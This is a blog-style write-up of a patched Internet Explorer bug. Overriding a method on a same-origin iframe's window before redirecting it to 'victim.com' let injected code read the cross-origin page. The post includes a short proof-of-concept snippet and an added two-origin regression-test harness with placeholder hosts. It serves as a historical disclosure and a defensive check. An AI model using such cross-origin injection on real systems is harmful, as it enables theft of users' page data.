By overriding a method on a same-origin IFrame’s window before redirecting it to another domain, I could inject a function that would fire in the new cross-origin context when the method was eventually called by the target page’s own scripts.
// Override attachEvent on the same-origin IFrame before redirecting
window[0].attachEvent = function() {
alert(this.document.body.innerText); // Runs in the cross-origin context
};
// Redirect the IFrame to the victim domain
window[0].location = "http://www.victim.com/";
The victim page called attachEvent as part of its own initialization, but because the property had been overridden on the window object before the navigation, the attacker’s function ran with access to the new document. This was a case where IE did not clear property overrides on a window object when the origin changed.
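As an added regression check, not code from the original post: a two-origin harness that repeats the override-then-navigate sequence described above and reports whether the cross-origin document still sees the parent's function. It assumes two origins you control, https://a.example (parent) and https://b.example (probe); both are placeholders.

```html
<!-- parent.html, served from https://a.example (placeholder origin A) -->
<!DOCTYPE html>
<meta charset="utf-8">
<pre id="out">running...</pre>
<script>
  const PROBE_ORIGIN = "https://b.example"; // placeholder origin B, serves probe.html
  const out = document.getElementById("out");

  // Step 3: receive the probe's verdict; accept messages from origin B only.
  window.addEventListener("message", (e) => {
    if (e.origin !== PROBE_ORIGIN || !e.data || typeof e.data.tampered !== "boolean") return;
    out.textContent = e.data.tampered
      ? "FAIL: parent's override survived the cross-origin navigation"
      : "PASS: override was discarded when the frame changed origin";
  });

  // Step 1: load a same-origin page in the frame so its window is scriptable.
  const frame = document.createElement("iframe");
  frame.addEventListener("load", () => {
    // Override a method on the still-same-origin window (same pattern as attachEvent above).
    frame.contentWindow.addEventListener = function tampered() {};
    // Step 2: navigate the frame cross-origin; a correct browser gives it a fresh Window.
    frame.src = PROBE_ORIGIN + "/probe.html";
  }, { once: true });
  frame.src = "/blank.html"; // any same-origin page (placeholder)
  document.body.appendChild(frame);
</script>

<!-- probe.html, served from https://b.example (placeholder origin B) -->
<!DOCTYPE html>
<meta charset="utf-8">
<script>
  // Natively, addEventListener is inherited from EventTarget.prototype, so an own
  // property on window means the parent's assignment leaked into this document.
  const tampered = Object.prototype.hasOwnProperty.call(window, "addEventListener");
  parent.postMessage({ tampered }, "https://a.example"); // placeholder origin A
</script>
```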
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.